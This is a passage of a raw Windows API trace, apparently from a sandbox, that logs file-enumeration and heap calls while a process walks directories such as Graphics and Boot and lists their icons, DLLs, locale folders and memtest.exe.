ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.880] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0045.880] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0045.880] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0045.880] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0045.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.880] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0045.880] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.880] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.896] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.899] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0045.899] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0045.899] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0045.899] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0045.899] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0045.900] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0045.900] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0045.900] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0045.900] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0045.900] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0046.620] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0046.621] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0046.621] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0046.621] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.622] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0046.623] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.623] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0046.623] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.623] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.624] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.624] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.624] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.624] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.624] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0046.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.625] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0046.625] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.625] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0046.625] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.625] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0046.625] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.625] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0046.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.627] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0046.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.627] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0046.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.627] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0046.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.627] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0046.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.627] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0046.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.628] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0046.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.628] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0046.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.628] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0046.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.628] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0046.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.628] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0046.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.629] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, 